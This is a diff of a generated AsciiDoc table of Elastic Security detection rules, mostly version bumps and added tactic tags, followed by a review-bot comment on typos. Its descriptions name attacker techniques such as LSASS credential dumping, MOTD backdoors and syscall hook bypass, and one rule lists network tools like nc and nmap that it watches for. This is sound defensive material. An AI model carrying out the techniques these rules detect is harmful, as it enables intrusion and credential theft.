+|<<suspicious-execution-via-msiexec, Suspicious Execution via MSIEXEC>> |Identifies suspicious execution of the built-in Windows Installer, msiexec.exe, to install a package from usual paths or parent process. Adversaries may abuse msiexec.exe to launch malicious local MSI files. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 |<<suspicious-execution-via-microsoft-office-add-ins, Suspicious Execution via Microsoft Office Add-Ins>> |Identifies execution of common Microsoft Office applications to launch an Office Add-In from a suspicious path or with an unusual parent process. This may indicate an attempt to get initial access via a malicious phishing MS Office Add-In. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 -|<<suspicious-execution-via-scheduled-task, Suspicious Execution via Scheduled Task>> |Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-execution-via-scheduled-task, Suspicious Execution via Scheduled Task>> |Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |105 |<<suspicious-execution-via-windows-subsystem-for-linux, Suspicious Execution via Windows Subsystem for Linux>> |Detects Linux Bash commands from the the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 -|<<suspicious-explorer-child-process, Suspicious Explorer Child Process>> |Identifies a suspicious Windows explorer child process. 
Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<suspicious-explorer-child-process, Suspicious Explorer Child Process>> |Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<suspicious-file-changes-activity-detected, Suspicious File Changes Activity Detected>> |This rule identifies a sequence of 100 file extension rename events within a set of common file paths by the same process in a timespan of 1 second. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |5 +|<<suspicious-file-changes-activity-detected, Suspicious File Changes Activity Detected>> |This rule identifies a sequence of 100 file extension rename events within a set of common file paths by the same process in a timespan of 1 second. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |6 -|<<suspicious-file-creation-in-etc-for-persistence, Suspicious File Creation in /etc for Persistence>> |Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Threat: Lightning Framework], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 +|<<suspicious-file-creation-in-etc-for-persistence, Suspicious File Creation in /etc for Persistence>> |Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Threat: Lightning Framework], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |109 |<<suspicious-html-file-creation, Suspicious HTML File Creation>> |Identifies the execution of a browser process to open an HTML file with high entropy and size. Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Defend] |8.3.0 |104 |<<suspicious-hidden-child-process-of-launchd, Suspicious Hidden Child Process of Launchd>> |Identifies the execution of a launchd child process with a hidden file. 
An adversary can establish persistence by installing a new logon item, launch agent, or daemon that executes upon login. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-image-load-taskschd-dll-from-ms-office, Suspicious Image Load (taskschd.dll) from MS Office>> |Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-image-load-taskschd-dll-from-ms-office, Suspicious Image Load (taskschd.dll) from MS Office>> |Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<suspicious-imagepath-service-creation, Suspicious ImagePath Service Creation>> |Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-imagepath-service-creation, Suspicious ImagePath Service Creation>> |Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<suspicious-inter-process-communication-via-outlook, Suspicious Inter-Process Communication via Outlook>> |Detects Inter-Process Communication with Outlook via Component Object Model from an unusual process. Adversaries may target user email to collect sensitive information or send email on their behalf via API. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend] |8.4.0 |4 |<<suspicious-interactive-shell-spawned-from-inside-a-container, Suspicious Interactive Shell Spawned From Inside A Container>> |This rule detects when an interactive shell is spawned inside a running container. This could indicate a potential container breakout attempt or an attacker's attempt to gain unauthorized access to the underlying host. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.8.0 |2 -|<<suspicious-java-child-process, Suspicious JAVA Child Process>> |Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability. 
|[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |105 +|<<suspicious-java-child-process, Suspicious JAVA Child Process>> |Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.6.0 |205 |<<suspicious-lsass-access-via-malseclogon, Suspicious LSASS Access via MalSecLogon>> |Identifies suspicious access to LSASS handle from a call trace pointing to seclogon.dll and with a suspicious access rights value. This may indicate an attempt to leak an LSASS handle via abusing the Secondary Logon service in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.8.0 |206 |<<suspicious-lsass-process-access, Suspicious Lsass Process Access>> |Identifies access attempts to LSASS handle, this may indicate an attempt to dump credentials from Lsass memory. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.8.0 |105 -|<<suspicious-ms-office-child-process, Suspicious MS Office Child Process>> |Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-ms-office-child-process, Suspicious MS Office Child Process>> |Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<suspicious-ms-outlook-child-process, Suspicious MS Outlook Child Process>> |Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<suspicious-ms-outlook-child-process, Suspicious MS Outlook Child Process>> |Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<suspicious-managed-code-hosting-process, Suspicious Managed Code Hosting Process>> |Identifies a suspicious managed code hosting process which could indicate code injection or other form of suspicious code execution. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-managed-code-hosting-process, Suspicious Managed Code Hosting Process>> |Identifies a suspicious managed code hosting process which could indicate code injection or other form of suspicious code execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 |<<suspicious-microsoft-365-mail-access-by-clientappid, Suspicious Microsoft 365 Mail Access by ClientAppId>> |Identifies when a Microsoft 365 Mailbox is accessed by a ClientAppId that was observed for the fist time during the last 10 days. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access] |8.6.0 |1 |<<suspicious-microsoft-diagnostics-wizard-execution, Suspicious Microsoft Diagnostics Wizard Execution>> |Identifies potential abuse of the Microsoft Diagnostics Troubleshooting Wizard (MSDT) to proxy malicious command or binary execution via malicious process arguments. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<suspicious-mining-process-creation-event, Suspicious Mining Process Creation Event>> |Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 +|<<suspicious-mining-process-creation-event, Suspicious Mining Process Creation Event>> |Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 -|<<suspicious-modprobe-file-event, Suspicious Modprobe File Event>> |Detects file events involving kernel modules in modprobe configuration files, which may indicate unauthorized access or manipulation of critical kernel modules. Attackers may tamper with the modprobe files to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities within the system. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |3 +|<<suspicious-modprobe-file-event, Suspicious Modprobe File Event>> |Detects file events involving kernel modules in modprobe configuration files, which may indicate unauthorized access or manipulation of critical kernel modules. Attackers may tamper with the modprobe files to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities within the system. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.6.0 |103 |<<suspicious-module-loaded-by-lsass, Suspicious Module Loaded by LSASS>> |Identifies LSASS loading an unsigned or untrusted DLL. Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |4 -|<<suspicious-network-activity-to-the-internet-by-previously-unknown-executable, Suspicious Network Activity to the Internet by Previously Unknown Executable>> |This rule monitors for network connectivity to the internet from a previously unknown executable located in a suspicious directory to a previously unknown destination ip. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to establish connections to unknown or suspicious destinations such as a command and control server. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |3 +|<<suspicious-network-activity-to-the-internet-by-previously-unknown-executable, Suspicious Network Activity to the Internet by Previously Unknown Executable>> |This rule monitors for network connectivity to the internet from a previously unknown executable located in a suspicious directory to a previously unknown destination ip. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to establish connections to unknown or suspicious destinations such as a command and control server. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |4 |<<suspicious-network-tool-launched-inside-a-container, Suspicious Network Tool Launched Inside A Container>> |This rule detects commonly abused network utilities running inside a container. Network utilities like nc, nmap, dig, tcpdump, ngrep, telnet, mitmproxy, zmap can be used for malicious purposes such as network reconnaissance, monitoring, or exploitation, and should be monitored closely within a container. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Command and Control], [Tactic: Reconnaissance] |8.8.0 |2 -|<<suspicious-pdf-reader-child-process, Suspicious PDF Reader Child Process>> |Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<suspicious-pdf-reader-child-process, Suspicious PDF Reader Child Process>> |Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Initial Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<suspicious-portable-executable-encoded-in-powershell-script, Suspicious Portable Executable Encoded in Powershell Script>> |Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. 
Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |107 +|<<suspicious-portable-executable-encoded-in-powershell-script, Suspicious Portable Executable Encoded in Powershell Script>> |Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 |<<suspicious-powershell-engine-imageload, Suspicious PowerShell Engine ImageLoad>> |Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |208 
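Review bot: the new Suspicious Execution via MSIEXEC row describes msiexec.exe installing "a package from usual paths or parent process", which contradicts the rule's purpose; it should read "unusual paths or parent process", and since this table is generated the fix belongs in the rule's description upstream rather than in the .asciidoc. In the same hunk, three pre-existing typos sit in unchanged context rows that the next regeneration could pick up if fixed at the source: "observed for the fist time" (Suspicious Microsoft 365 Mail Access by ClientAppId), "from the the Windows Subsystem for Linux" (Suspicious Execution via Windows Subsystem for Linux), and "loaded into LSSAS process" (Suspicious Module Loaded by LSASS). Also, the lone `+` blank line inserted immediately before the Suspicious Execution from a Mounted Device row looks like generator noise; it renders fine inside an AsciiDoc table but drop it if it was not intended.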
@@ -1630,67 +1690,75 @@ and their rule type is `machine_learning`. |<<suspicious-printspooler-service-executable-file-creation, Suspicious PrintSpooler Service Executable File Creation>> |Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service. For more information refer to the following CVE's - CVE-2020-1048, CVE-2020-1337 and CVE-2020-1300 and verify that the impacted system is patched. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-proc-pseudo-file-system-enumeration, Suspicious Proc Pseudo File System Enumeration>> |This rule monitors for a rapid enumeration of 25 different proc cmd, stat, and exe files, which suggests an abnormal activity pattern. Such behavior could be an indicator of a malicious process scanning or gathering information about running processes, potentially for reconnaissance, privilege escalation, or identifying vulnerable targets. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |3 +|<<suspicious-proc-pseudo-file-system-enumeration, Suspicious Proc Pseudo File System Enumeration>> |This rule monitors for a rapid enumeration of 25 different proc cmd, stat, and exe files, which suggests an abnormal activity pattern. Such behavior could be an indicator of a malicious process scanning or gathering information about running processes, potentially for reconnaissance, privilege escalation, or identifying vulnerable targets. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |4 -|<<suspicious-process-access-via-direct-system-call, Suspicious Process Access via Direct System Call>> |Identifies suspicious process access events from an unknown memory region. 
Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Sysmon Only] |8.8.0 |208 +|<<suspicious-process-access-via-direct-system-call, Suspicious Process Access via Direct System Call>> |Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Sysmon Only] |8.8.0 |209 |<<suspicious-process-creation-calltrace, Suspicious Process Creation CallTrace>> |Identifies when a process is created and immediately accessed from an unknown memory code region and by the same parent process. This may indicate a code injection attempt. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Sysmon Only] |8.8.0 |207 -|<<suspicious-process-execution-via-renamed-psexec-executable, Suspicious Process Execution via Renamed PsExec Executable>> |Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-process-execution-via-renamed-psexec-executable, Suspicious Process Execution via Renamed PsExec Executable>> |Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 -|<<suspicious-process-spawned-from-motd-detected, Suspicious Process Spawned from MOTD Detected>> |Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the execution of potentially malicious processes through the MOTD utility. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |5 +|<<suspicious-process-spawned-from-motd-detected, Suspicious Process Spawned from MOTD Detected>> |Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. 
These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the execution of potentially malicious processes through the MOTD utility. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |6 -|<<suspicious-rdp-activex-client-loaded, Suspicious RDP ActiveX Client Loaded>> |Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-rdp-activex-client-loaded, Suspicious RDP ActiveX Client Loaded>> |Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<suspicious-remote-registry-access-via-sebackupprivilege, Suspicious Remote Registry Access via SeBackupPrivilege>> |Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Credential Access], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |107 +|<<suspicious-remote-registry-access-via-sebackupprivilege, Suspicious Remote Registry Access via SeBackupPrivilege>> |Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Credential Access], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |108 -|<<suspicious-renaming-of-esxi-files, Suspicious Renaming of ESXI Files>> |Identifies instances where VMware-related files, such as those with extensions like ".vmdk", ".vmx", ".vmxf", ".vmsd", ".vmsn", ".vswp", ".vmss", ".nvram", and ".vmem", are renamed on a Linux system. The rule monitors for the "rename" event action associated with these file types, which could indicate malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |3 +|<<suspicious-renaming-of-esxi-files, Suspicious Renaming of ESXI Files>> |Identifies instances where VMware-related files, such as those with extensions like ".vmdk", ".vmx", ".vmxf", ".vmsd", ".vmsn", ".vswp", ".vmss", ".nvram", and ".vmem", are renamed on a Linux system. The rule monitors for the "rename" event action associated with these file types, which could indicate malicious activity. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |4 -|<<suspicious-renaming-of-esxi-index-html-file, Suspicious Renaming of ESXI index.html File>> |Identifies instances where the "index.html" file within the "/usr/lib/vmware/*" directory is renamed on a Linux system. The rule monitors for the "rename" event action associated with this specific file and path, which could indicate malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |3 +|<<suspicious-renaming-of-esxi-index-html-file, Suspicious Renaming of ESXI index.html File>> |Identifies instances where the "index.html" file within the "/usr/lib/vmware/*" directory is renamed on a Linux system. The rule monitors for the "rename" event action associated with this specific file and path, which could indicate malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |4 -|<<suspicious-script-object-execution, Suspicious Script Object Execution>> |Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-script-object-execution, Suspicious Script Object Execution>> |Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 |<<suspicious-service-was-installed-in-the-system, Suspicious Service was Installed in the System>> |Identifies the creation of a new Windows service with suspicious Service command values. 
Windows services typically run as SYSTEM and can be used for privilege escalation and persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide] |8.3.0 |8 |<<suspicious-solarwinds-child-process, Suspicious SolarWinds Child Process>> |A suspicious SolarWinds child process was detected, which may indicate an attempt to execute malicious programs. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<suspicious-startup-shell-folder-modification, Suspicious Startup Shell Folder Modification>> |Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-startup-shell-folder-modification, Suspicious Startup Shell Folder Modification>> |Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 + +|<<suspicious-symbolic-link-created, Suspicious Symbolic Link Created>> |Identifies the creation of a symbolic link to a suspicious file or location. A symbolic link is a reference to a file or directory that acts as a pointer or shortcut, allowing users to access the target file or directory from a different location in the file system. 
An attacker can potentially leverage symbolic links for privilege escalation by tricking a privileged process into following the symbolic link to a sensitive file, giving the attacker access to data or capabilities they would not normally have. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 -|<<suspicious-symbolic-link-created, Suspicious Symbolic Link Created>> |Identifies the creation of a symbolic link to a suspicious file or location. A symbolic link is a reference to a file or directory that acts as a pointer or shortcut, allowing users to access the target file or directory from a different location in the file system. An attacker can potentially leverage symbolic links for privilege escalation by tricking a privileged process into following the symbolic link to a sensitive file, giving the attacker access to data or capabilities they would not normally have. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |2 +|<<suspicious-sysctl-file-event, Suspicious Sysctl File Event>> |Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc/sysctl.d/*.conf) to identify potential unauthorized access or manipulation of system-level configuration settings. Attackers may tamper with the sysctl configuration files to modify kernel parameters, potentially compromising system stability, performance, or security. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.6.0 |103 